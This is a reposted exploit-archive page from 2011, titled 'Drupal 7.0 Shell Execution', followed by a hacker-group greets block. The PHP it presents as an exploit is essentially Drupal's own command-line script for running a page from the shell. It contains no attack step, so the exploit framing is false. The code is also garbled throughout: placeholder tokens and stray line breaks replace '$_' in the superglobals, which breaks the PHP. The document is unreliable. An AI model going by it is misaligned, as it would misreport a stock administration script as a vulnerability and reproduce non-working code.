Drupal 7.0 Shell Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容
Drupal 7.0 Shell Execution
来源：ked-h@exploit-id.com 作者：KedAns-Dz 发布时间：2011-04-11
#!/usr/bin/env php
<?php

/**
 * Drupal 7.0 Shell Execution Script
 * ================
 * By KedAns-Dz <ked-h@exploit-id.com>
 * ================
 * (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh 
 * The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts
 * ================
 * ------------------------
 * Check for your PHP interpreter - on Windows you'll probably have to
 * replace line 1 with : 
 * #!c:/program files/php/php.exe
 * @param path  Drupal's absolute root directory in local file system (optional).
 * @param URI   A URI to execute, including HTTP protocol prefix.
 */
$script = basename(array_shift(___FCKpd___0
SERVER['argv']));

if (in_array('--help', ___FCKpd___0
SERVER['argv']) || empty(___FCKpd___0
SERVER['argv'])) {
  echo <<<EOF

Execute a Drupal page from the shell.

Usage:        {$script} [OPTIONS] "<URI>"
Example:      {$script} "http://target.org/node"

All arguments are long options.

  --help      This page.

  --root      Set the working directory for the script to the specified path.
              To execute Drupal this has to be the root directory of your
              Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
              running on Unix). Current directory is not required.
              Use surrounding quotation marks on Windows.

  --verbose   This option displays the options as they are set, but will
              produce errors from setting the session.

  URI         The URI to execute, i.e. http://default/foo/bar for executing
              the path '/foo/bar' in your site 'default'. URI has to be
              enclosed by quotation marks if there are ampersands in it
              (f.e. index.php?q=node&foo=bar). Prefix 'http://' is required,
              and the domain must exist in Drupal's sites-directory.

              If the given path and file exists it will be executed directly,
              i.e. if URI is set to http://default/bar/foo.php
              and bar/foo.php exists, this script will be executed without
              bootstrapping Drupal. To execute Drupal's cron.php, specify
              http://default/cron.php as the URI.


To run this script without --root argument invoke it from the root directory
of your Drupal installation with

  ./scripts/{$script}
\n
EOF;
  exit;
}

// define default settings
$cmd = 'index.php';
___FCKpd___0
SERVER['HTTP_HOST']       = 'default';
___FCKpd___0
SERVER['PHP_SELF']        = '/index.php';
___FCKpd___0
SERVER['REMOTE_ADDR']     = '127.0.0.1';
___FCKpd___0
SERVER['SERVER_SOFTWARE'] = NULL;
___FCKpd___0
SERVER['REQUEST_METHOD']  = 'GET';
___FCKpd___0
SERVER['QUERY_STRING']    = '';
___FCKpd___0
SERVER['PHP_SELF']        = ___FCKpd___0
SERVER['REQUEST_URI'] = '/';
___FCKpd___0
SERVER['HTTP_USER_AGENT'] = 'console';

// toggle verbose mode
if (in_array('--verbose', ___FCKpd___0
SERVER['argv'])) {
  ___FCKpd___0
verbose_mode = true;
}
else {
  ___FCKpd___0
verbose_mode = false;
}

// parse invocation arguments
while ($param = array_shift(___FCKpd___0
SERVER['argv'])) {
  switch ($param) {
    case '--root':
      // change working directory
      $path = array_shift(___FCKpd___0
SERVER['argv']);
      if (is_dir($path)) {
        chdir($path);
        if (___FCKpd___0
verbose_mode) {
          echo "cwd changed to: {$path}\n";
        }
      }
      else {
        echo "\nERROR: {$path} not found.\n\n";
      }
      break;

    default:
      if (substr($param, 0, 2) == '--') {
        // ignore unknown options
        break;
      }
      else {
        // parse the URI
        $path = parse_url($param);

        // set site name
        if (isset($path['host'])) {
          ___FCKpd___0
SERVER['HTTP_HOST'] = $path['host'];
        }

        // set query string
        if (isset($path['query'])) {
          ___FCKpd___0
SERVER['QUERY_STRING'] = $path['query'];
          parse_str($path['query'], ___FCKpd___0
GET);
          ___FCKpd___0
REQUEST = ___FCKpd___0
GET;
        }

        // set file to execute or Drupal path (clean urls enabled)
        if (isset($path['path']) && file_exists(substr($path['path'], 1))) {
          ___FCKpd___0
SERVER['PHP_SELF'] = ___FCKpd___0
SERVER['REQUEST_URI'] = $path['path'];
          $cmd = substr($path['path'], 1);
        }
        elseif (isset($path['path'])) {
          if (!isset(___FCKpd___0
GET['q'])) {
            ___FCKpd___0
REQUEST['q'] = ___FCKpd___0
GET['q'] = $path['path'];
          }
        }

        // display setup in verbose mode
        if (___FCKpd___0
verbose_mode) {
          echo "Hostname set to: {___FCKpd___0
SERVER['HTTP_HOST']}\n";
          echo "Script name set to: {$cmd}\n";
          echo "Path set to: {___FCKpd___0
GET['q']}\n";
        }
      }
      break;
  }
}

if (file_exists($cmd)) {
  include $cmd;
}
else {
  echo "\nERROR: {$cmd} not found.\n\n";
}
exit();
/***============================================================================================
***================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
* Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
* Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
* Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
* Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com)
* Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
* Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
* Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
* 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com 
* www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
*================================================================================================
*/
[